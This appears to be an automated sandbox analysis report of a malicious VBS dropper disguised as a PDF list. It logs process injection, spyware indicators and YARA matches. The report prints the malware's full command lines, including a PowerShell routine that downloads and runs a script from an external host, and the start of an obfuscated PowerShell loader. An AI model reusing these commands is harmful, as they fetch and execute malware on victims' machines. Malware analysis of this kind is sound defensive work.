                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_3_00007DF4655F1CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free,24_3_00007DF4655F1CE8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_3_00007DF4655F1958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,24_3_00007DF4655F1958
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609290C NtAcceptConnectPort,24_2_00000286F609290C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6093158 NtAcceptConnectPort,24_2_00000286F6093158
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6092DDC NtAcceptConnectPort,24_2_00000286F6092DDC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6092E84 NtAcceptConnectPort,24_2_00000286F6092E84
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6092EC8 NtAcceptConnectPort,24_2_00000286F6092EC8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6092CAC NtAcceptConnectPort,24_2_00000286F6092CAC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6092D80 NtAcceptConnectPort,24_2_00000286F6092D80
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6092DAC NtAcceptConnectPort,24_2_00000286F6092DAC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6092A20 NtAcceptConnectPort,24_2_00000286F6092A20
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF465602E90 NtQuerySystemInformation,NtQuerySystemInformation,24_2_00007DF465602E90
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF4656325D4 NtQuerySystemInformation,NtQuerySystemInformation,24_2_00007DF4656325D4
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC54083970 NtQuerySystemInformation,25_2_000001FC54083970
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7CAB626_2_00007FFD9B7CAB62
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7CB8D26_2_00007FFD9B7CB8D2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B898FED6_2_00007FFD9B898FED
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B89A52A6_2_00007FFD9B89A52A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0282E6A89_2_0282E6A8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0282EF789_2_0282EF78
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0282E3609_2_0282E360
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000002435D531BBC18_3_000002435D531BBC
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000002435D5327B218_3_000002435D5327B2
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000002435D532C5218_3_000002435D532C52
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000002435D534A5018_3_000002435D534A50
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000002435D535E9418_3_000002435D535E94
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000002435D53559418_3_000002435D535594
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000002435D53591418_3_000002435D535914
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000002435D53250D18_3_000002435D53250D
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44159D42C18_3_00007DF44159D42C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415808CC18_3_00007DF4415808CC
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44156286C18_3_00007DF44156286C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415810BC18_3_00007DF4415810BC
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164E0B018_3_00007DF44164E0B0
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF441565F9C18_3_00007DF441565F9C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415BFF7818_3_00007DF4415BFF78
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44156105818_3_00007DF441561058
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415CD2A018_3_00007DF4415CD2A0
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415B52F418_3_00007DF4415B52F4
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4416532F818_3_00007DF4416532F8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415721F018_3_00007DF4415721F0
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164A19C18_3_00007DF44164A19C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415DD24818_3_00007DF4415DD248
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4416423D818_3_00007DF4416423D8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415D13BC18_3_00007DF4415D13BC
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44160A3C818_3_00007DF44160A3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164D75C18_3_00007DF44164D75C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415E071C18_3_00007DF4415E071C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44165A59818_3_00007DF44165A598
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164757818_3_00007DF441647578
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415B564018_3_00007DF4415B5640
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164E5F418_3_00007DF44164E5F4
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415B395C18_3_00007DF4415B395C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44157E97018_3_00007DF44157E970
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164E77418_3_00007DF44164E774
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415D582418_3_00007DF4415D5824
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF441577AE018_3_00007DF441577AE0
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415C0AD418_3_00007DF4415C0AD4
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44165AAB418_3_00007DF44165AAB4
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415CCB5C18_3_00007DF4415CCB5C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415A8B2818_3_00007DF4415A8B28
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164EB0C18_3_00007DF44164EB0C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44156F9C018_3_00007DF44156F9C0
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4416019B418_3_00007DF4416019B4
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415B3CE818_3_00007DF4415B3CE8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164DC9418_3_00007DF44164DC94
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415BCC8418_3_00007DF4415BCC84
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415CCD3818_3_00007DF4415CCD38
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415BECF818_3_00007DF4415BECF8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415B6BE418_3_00007DF4415B6BE4
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158CBE818_3_00007DF44158CBE8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44163DBC818_3_00007DF44163DBC8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44164BC6818_3_00007DF44164BC68
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44165DF6C18_3_00007DF44165DF6C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF441580EF418_3_00007DF441580EF4
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415CCE4818_3_00007DF4415CCE48
                        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002435D420C7018_2_000002435D420C70
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_3_00007DF4655F4EFC24_3_00007DF4655F4EFC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_3_00007DF4655F392C24_3_00007DF4655F392C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_3_00007DF4655F220424_3_00007DF4655F2204
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F608262C24_2_00000286F608262C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609321824_2_00000286F6093218
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F608C2D024_2_00000286F608C2D0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F6095FCC24_2_00000286F6095FCC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60BAFF024_2_00000286F60BAFF0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60AE02824_2_00000286F60AE028
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60C104824_2_00000286F60C1048
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60A786824_2_00000286F60A7868
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B50A424_2_00000286F60B50A4
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60A089824_2_00000286F60A0898
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B60EC24_2_00000286F60B60EC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60C011424_2_00000286F60C0114
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60BF15824_2_00000286F60BF158
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60BF9A424_2_00000286F60BF9A4
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609C5D824_2_00000286F609C5D8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60A7E5824_2_00000286F60A7E58
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609CE7024_2_00000286F609CE70
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60A467824_2_00000286F60A4678
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60A8E8824_2_00000286F60A8E88
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B669C24_2_00000286F60B669C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609D73024_2_00000286F609D730
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B474424_2_00000286F60B4744
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60BD3C824_2_00000286F60BD3C8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609E40424_2_00000286F609E404
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60C6C0824_2_00000286F60C6C08
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B0C4C24_2_00000286F60B0C4C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60BF4B824_2_00000286F60BF4B8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60814D024_2_00000286F60814D0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60A74EC24_2_00000286F60A74EC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609FD3C24_2_00000286F609FD3C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60C156424_2_00000286F60C1564
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609758024_2_00000286F6097580
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B5D8424_2_00000286F60B5D84
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B9DA824_2_00000286F60B9DA8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B55BC24_2_00000286F60B55BC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B420C24_2_00000286F60B420C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60B522424_2_00000286F60B5224
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60C422124_2_00000286F60C4221
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609723424_2_00000286F6097234
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F60C0A4424_2_00000286F60C0A44
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F609EABC24_2_00000286F609EABC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF46560F8E024_2_00007DF46560F8E0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF465619C7424_2_00007DF465619C74
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF46561152C24_2_00007DF46561152C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF4656127AC24_2_00007DF4656127AC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF46560F04824_2_00007DF46560F048
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF46561728D24_2_00007DF46561728D
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF465610E7424_2_00007DF465610E74
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF46561330824_2_00007DF465613308
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF4656101A024_2_00007DF4656101A0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF46563848024_2_00007DF465638480
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF465638FDC24_2_00007DF465638FDC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF465639C1824_2_00007DF465639C18
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF46563720024_2_00007DF465637200
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00007DF4656522CC24_2_00007DF4656522CC
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5408C6AC25_2_000001FC5408C6AC
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540A26D425_2_000001FC540A26D4
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC54088ECC25_2_000001FC54088ECC
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5408D6DC25_2_000001FC5408D6DC
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5409AEF025_2_000001FC5409AEF0
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540B1F2825_2_000001FC540B1F28
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540AC78825_2_000001FC540AC788
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540A478025_2_000001FC540A4780
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC54098F9825_2_000001FC54098F98
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5409F84C25_2_000001FC5409F84C
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5409287C25_2_000001FC5409287C
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5408C0BC25_2_000001FC5408C0BC
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540998F825_2_000001FC540998F8
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5409A94025_2_000001FC5409A940
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540A426425_2_000001FC540A4264
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC54098A6025_2_000001FC54098A60
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC54099A7825_2_000001FC54099A78
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540A333025_2_000001FC540A3330
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540A237425_2_000001FC540A2374
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540993B425_2_000001FC540993B4
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540A2BC025_2_000001FC540A2BC0
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5408745425_2_000001FC54087454
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540A3C6025_2_000001FC540A3C60
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540954A025_2_000001FC540954A0
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5408BD4025_2_000001FC5408BD40
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5409A5D825_2_000001FC5409A5D8
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC5409E5FC25_2_000001FC5409E5FC
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC54099E1025_2_000001FC54099E10
                        Source: C:\Windows\System32\dllhost.exeCode function: 25_2_000001FC540AC62025_2_000001FC540AC620
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4553
                        Source: unknownProcess created: Commandline size = 4553
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4553Jump to behavior
                        Source: amsi32_7260.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7260, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@39/18@14/13
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44156286C CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,SuspendThread,18_3_00007DF44156286C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\udkz59n9.vbsJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4b44c99e-e2eb-c0a4be-89a68ae4061c}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxjhzpmv.0an.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7924
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7260
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: svchost.exe, 00000012.00000003.2781284706.00007DF441663000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2402423564.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2401495928.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2780602993.00000243614E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: svchost.exe, 00000012.00000003.2781284706.00007DF441663000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2402423564.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2401495928.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2780602993.00000243614E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: svchost.exe, 00000012.00000003.2781284706.00007DF441663000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2402423564.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2401495928.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2780602993.00000243614E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                        Source: svchost.exe, 00000012.00000003.2781284706.00007DF441663000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2402423564.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2401495928.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2780602993.00000243614E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: svchost.exe, 00000012.00000003.2781284706.00007DF441663000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2402423564.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2401495928.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2780602993.00000243614E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: svchost.exe, 00000012.00000003.2781284706.00007DF441663000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2402423564.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2401495928.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2780602993.00000243614E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: svchost.exe, 00000012.00000003.2505172972.000002435DC17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: svchost.exe, 00000012.00000003.2781284706.00007DF441663000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2402423564.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2401495928.0000024361010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2780602993.00000243614E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 